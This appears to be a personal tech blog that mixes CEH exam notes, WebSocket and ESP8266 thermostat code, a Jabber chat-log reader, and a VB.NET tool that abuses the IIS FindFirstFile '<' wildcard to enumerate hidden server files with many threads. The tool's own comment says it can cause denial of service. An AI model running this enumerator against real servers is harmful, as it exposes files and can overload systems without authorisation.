So, Today’s the day. I am submitting my application for the CEH exam. To my surprise that actually care about your training and creds before taking the test unlike compTIA’s A+, Network+ or Security+ exams. I attached the link below for anyone who is interested in taking the exam. You require a minimum of two years in the IT security field, I professionally am going on 5+, so I at least have that going for me, and you need to have a Supervisor in the field vouch for you to take the exam. I’ve been going up and down pluralsight’s material and in a nutshell, it appears to be on the opposite side of the security+ exam, more on the offensive than the defensive. So let’s just take a peek at the cost of the exam…. do da do do do… $950!? Geezus! Well looks like it’s back to the good ol’ top ramen diet again for awhile.
Exploiting FindFirstFile on WebServers
So, depending on the version of IIS installed on a Server, the “<<” or “>>” can be used as a wildcard for browsing to files. This issue is at the DOS Wildcard level, Src: Stack overflow. I need to add additional information, I’ll edit this post when I get addtional time.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
Public Class Form1 Dim NewLetter As Char Dim MyWebRequest As New Net.WebClient() Dim Extention As String = ".cfm" Dim FileLen As Integer = 0 Dim SleepTime As Integer = 1000 Const WebSite As String = "http://MyWebsite.com/" Private Sub ExplorePath(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0) Application.DoEvents() Dim Data As Byte() = Nothing Dim NumberOfFilesFound As Integer = 0 Dim DataLength As Integer = 0 NumberOfFilesFound = 0 Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention) Try If LastAscii = 0 Then Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention) Else Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention) End If If DataLength <> Data.Length Then If LastAscii = 0 Then ListBox1.Items.Add(RequestString & "<" & Extention) Else ListBox1.Items.Add(RequestString & Chr(LastAscii) & "<" & Extention) Try MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention) ListBox1.Items.Add("--[" & RequestString & Chr(LastAscii) & Extention & "]--") Catch ex As Exception End Try ExplorePath(RequestString & ChrW(LastAscii), 48) End If End If Catch ex As Exception DataLength = 0 End Try Select Case LastAscii Case 0 LastAscii = 48 Case 58 LastAscii = 65 'A Case 91 LastAscii = 48 'Zero Return Case Else LastAscii += 1 End Select Threading.Thread.Sleep(SleepTime) ExplorePath(RequestString, LastAscii) End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click 'THIS CAN DOS THE SYSTEM 'Add a Sleep Command 'Exit Sub Dim MyThread(25) As Threading.Thread Dim MyThreadClass(25) As ThreadClassAction If TextBox2.Text = "" Then For i = 0 To 25 MyThreadClass(i) = New ThreadClassAction MyThreadClass(i).CallBack = Me MyThread(i) = New Threading.Thread(AddressOf MyThreadClass(i).Launch) MyThread(i).Name = Chr(Asc("A") + i) MyThread(i).IsBackground = True MyThread(i).Start() Next Else Extention = TextBox1.Text ExplorePath(TextBox2.Text) MsgBox("Done!") End If End Sub End Class Public Class ThreadClass Public CallBack As Form Public Data As String Public Sub AddListItem1() Form1.ListBox1.Items.Add(Data) End Sub Public Sub AddListItem2() Form1.ListBox2.Items.Add(Data) End Sub End Class Public Class ThreadClassAction Public CallBack As Form Dim MyWebRequest As New Net.WebClient() Private Delegate Sub MyDelPtr() Public Extention As String = ".cfm" Const WebSite As String = "http://MyWebsite.com/" Public Sub Launch() ExplorePathThread(Threading.Thread.CurrentThread.Name) End Sub Private Sub ExplorePathThread(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0) Debug.WriteLine("Starting Thread: " & Threading.Thread.CurrentThread.Name) Application.DoEvents() Dim MyThreadClass As New ThreadClass MyThreadClass.CallBack = CallBack Dim MyDel1 = New MyDelPtr(AddressOf MyThreadClass.AddListItem1) Dim MyDel2 = New MyDelPtr(AddressOf MyThreadClass.AddListItem2) Dim Data As Byte() = Nothing Dim NumberOfFilesFound As Integer = 0 Dim DataLength As Integer = 0 NumberOfFilesFound = 0 Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention) Try If LastAscii = 0 Then Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention) Else Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention) End If If DataLength <> Data.Length Then If LastAscii = 0 Then MyThreadClass.Data = (RequestString & "<" & Extention) CallBack.Invoke(MyDel1) Else MyThreadClass.Data = (RequestString & Chr(LastAscii) & "<" & Extention) CallBack.Invoke(MyDel1) Try MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention) MyThreadClass.Data = ("--[" & RequestString & Chr(LastAscii) & Extention & "]--") CallBack.Invoke(MyDel2) Catch ex As Exception End Try ExplorePathThread(RequestString & ChrW(LastAscii), 48) End If End If Catch ex As Exception DataLength = 0 End Try Select Case LastAscii Case 0 LastAscii = 48 Case 58 LastAscii = 65 'A Case 91 LastAscii = 48 'Zero Return Case Else LastAscii += 1 End Select ExplorePathThread(RequestString, LastAscii) End Sub End Class |
Working with HTML5 WebSockets and Live updates via .NET
Here is an example of a drawup I threw together to allow dynamic row updating.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
<!DOCTYPE html> <html> <head> <script> var ClosedCaptioningSocket = new WebSocket("ws://[WANIP]:[WANPORT]/", "protocolOne") ClosedCaptioningSocket.onopen = function (event) { ClosedCaptioningSocket.send("Here's some text that the server is urgently awaiting!"); document.getElementById("CCDiv").style.display='block'; }; ClosedCaptioningSocket.onmessage = function (event) { document.getElementById("HTML5CC").innerHTML += event.data; document.getElementById("HTML5CC").scrollTop = document.getElementById("HTML5CC").scrollHeight } </script> </head> <body> <div id="CCDiv" name="CCDiv" style='display:none';> <br><br> Closed Captioning <br> <textarea name="HTML5CC" id="HTML5CC" rows="5" cols="200" readonly="false"></textarea> </div> </body> </html> |
Under the hood to send the data using .NET, Create a socket and send out data once connected to something like this.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
Public Sub SendData(Data As String) Dim Stream As NetworkStream = _TcpClient.GetStream() Dim DataToSend As Byte() = System.Text.Encoding.UTF8.GetBytes(Data) Dim FRRROPCODE As Byte = Convert.ToByte("10000001", 2) 'FIN is set, and OPCODE is 1 or Text Dim header As Byte() = {FRRROPCODE, Convert.ToByte(DataToSend.Length)} Dim ResponseData As Byte() ReDim ResponseData((header.Length + DataToSend.Length) - 1) 'NOTEWORTHY: if you Redim ResponseData(header.length + Payload.Length).. you'll add a 0 value byte at the end of the response data.. 'which tells the client that your next stream write will be a continuation frame.. Dim index As Integer = 0 Buffer.BlockCopy(header, 0, ResponseData, index, header.Length) index += header.Length Buffer.BlockCopy(DataToSend, 0, ResponseData, index, DataToSend.Length) index += DataToSend.Length Stream.Write(ResponseData, 0, ResponseData.Length) End Sub |
Pulling Jabber Chat Logs
So this little piece came in handy to pull and archive away chat logs on the client’s local machine. We barely just moved to Version 11.9 and now it seems to have broken/encrypted the database (Finally) But for anyone else still running an older version…
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
Imports System.Text.RegularExpressions Public Class Form1 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load Dim strDB As String = "Data Source=" & "C:\Users\" & Environment.UserName & "\AppData\Local\Cisco\Unified Communications\Jabber\CSF\History\" & Environment.UserName & "@[DOMAIN].db" & ";pooling=false" Using Sqlight As SQLite.SQLiteConnection = New SQLite.SQLiteConnection(strDB) Using Sqlcmd As SQLite.SQLiteCommand = Sqlight.CreateCommand() Sqlcmd.CommandText = "Select * from history_message order by date desc" Sqlight.Open() Try Using myReader As SQLite.SQLiteDataReader = Sqlcmd.ExecuteReader() While myReader.Read Dim pattern As String = "(?:<div>)(.+)<\/div>" Dim R As Regex = New Regex(pattern, RegexOptions.IgnoreCase) Dim m As Match = R.Match(myReader.GetString(2)) Dim Epoch As Integer = myReader.GetInt32(3) 'Debug.WriteLine(myReader.GetString(4) & " - " & FromUnix(Epoch, False) & ":" & m.Groups(1).ToString) Debug.WriteLine(myReader.GetString(4) & " - " & m.Groups(1).ToString) End While End Using Catch ex As Exception Debug.WriteLine(ex.Message) End Try End Using End Using End End Sub Public ReadOnly Property Epoch() As DateTime Get Return New DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc) End Get End Property Public Function FromUnix(ByVal seconds As Integer, local As Boolean) As DateTime Dim dt = Epoch.AddSeconds(seconds) If local Then dt = dt.ToLocalTime Return dt End Function Public Function ToUnix(ByVal dt As DateTime) As Integer If dt.Kind = DateTimeKind.Local Then dt = dt.ToUniversalTime Return CInt((dt - Epoch).TotalSeconds) End Function End Class |
ESP8266 NONOS SDK DHT Thermastat
So this weekend, I ended up overhauling my ESP8266 DHT library to make it plug and play into other projects. One big thing to take aware from this is that GPIO 15 is off limits due to the pin being required to be low / grounded during boot or it will not leverage SPI to start up.
Also GPIO16 is also off limits as well for GPIO toggling, With this being said 6-11 is also offlimits for SPI. So what’s left? Not much, I’m testing with GPIO13 at the moment to see if it can handle the data line floating while the esp is rebooting.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 |
//https://www.mikrocontroller.net/attachment/263828/The-ESP8266-Book-August-2015.pdf #include "ets_sys.h" #include "osapi.h" #include "gpio.h" #include "os_type.h" #include "ip_addr.h" #include "mem.h" #include "user_interface.h" #include "lwip/stats.h" #include "espconn.h" #include "c_types.h" ////ONE WIRE #include "../library/uart.h" //Copy these from your Driver Lib to your local folder #include "../library/gpio16.h" //Copy these from your Driver Lib to your local folder #include "../library/common.h" #include "../library/dht.h" #include "../library/station.h" #include "../library/sockets.h" /////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// #define user_procTaskPrio 0 #define user_procTaskQueueLen 1 os_event_t user_procTaskQueue[user_procTaskQueueLen]; void ICACHE_FLASH_ATTR StationConnected() { os_printf("[%s]\r\n", __func__); os_printf("Socket function Temp = %d *F, Hum = %d %%\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity)); init_sockets(NULL, NULL, NULL, NULL); //Do not override Socket.H callbacks //Creates Timer Socket uint8 FreeSocket = GetFreeSocket(); if (FreeSocket == 255) { os_printf("No Free socket avilable\r\n"); return; } os_strcpy(MySendDataStruct[FreeSocket].Name, "MyThermSocket"); MySendDataStruct[FreeSocket].Domain = DOMAIN; os_sprintf(MySendDataStruct[FreeSocket].DataToSend, "GET /MyEsp.php?ssid=myssid&IP=MyIp2&ID=MyId2&temp=%d&hum=%d HTTP/1.1\r\nUser-Agent: SomeAgent\r\nHost: %s\r\nAccept: */*\r\n\r\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity), DOMAIN); StartSendingSocketTimer(FreeSocket); } void ICACHE_FLASH_ATTR myDHTFunctionCallback(struct sensor_GlobalReading * MyReading) { os_printf("[%s]\r\n", __func__); os_printf("Callback function Temp = %d *F, Hum = %d %%\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity)); init_station("Thermastat.local", true, &StationConnected); //Connect to stronegest open AP } void ICACHE_FLASH_ATTR sdk_init_done_cb(void) { os_printf("[%s] initializing ESP8266!\r\n", __func__); SpiFlashOpResult ReadResult = spi_flash_read(ThermMemorySpace,(uint32 *)&ThermostatConfig,sizeof(ThermostatConfig)); if (ReadResult != SPI_FLASH_RESULT_OK || ThermostatConfig.programmed != 1 || true) //If not set, Set it.. { os_printf("Setting's not found, Calling Set_ThermostatSettings\r\n"); //NOTE: Don't use GPIO16/D0, This is reserved. //DHT22 GPIO=GPIO0/D3 Power=GPIO15/D8 PollingEnabled Interval=5Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=40 classification="warmer" DeepSleepAfterSend DeepSleepTime Enabled Reserved //SpiFlashOpResult writeResult = Set_ThermostatSettings(MySensor_DHT22, 0, 15, true, 5, true, false, 40, "warmer", false, NULL, true, NULL); //DHT22 Data=GPIO15/D8 Power=GPI13/D7 PollingEnabled Interval=5Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=40 classification="warmer" DeepSleepAfterSend DeepSleepTime Enabled Reserved SpiFlashOpResult writeResult = Set_ThermostatSettings(MySensor_DHT22, 13, 15, true, 5, true, false, 40, "warmer", false, NULL, true, NULL); //DHT22 GPIO=GPIO0/D3 Power=GPIO4/D2 PollingEnabled Interval=1Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=NULL classification=warmer/colder DeepSleepAfterSend DeepSleepTime Enabled Reserved //Set_ThermostatSettings(MySensor_DHT22, 0, 4, true, 1, true, false, NULL, "warmer", false, 5, true, NULL); if (writeResult == SPI_FLASH_RESULT_OK) { init_ThermostatSettings(&myDHTFunctionCallback); } } else { init_ThermostatSettings(&myDHTFunctionCallback); } } void ICACHE_FLASH_ATTR user_init() { //void uart0_tx_buffer(uint8 *buf, uint16 len) uart_div_modify(0, UART_CLK_FREQ / 115200); wifi_set_opmode(0); wifi_set_sleep_type( NONE_SLEEP_T ); ETS_GPIO_INTR_DISABLE();// Disable gpio interrupts gpio_init(); //Start os task system_init_done_cb(sdk_init_done_cb); //system_os_task(loop, user_procTaskPrio, user_procTaskQueue, user_procTaskQueueLen); //Task to Signal for later } |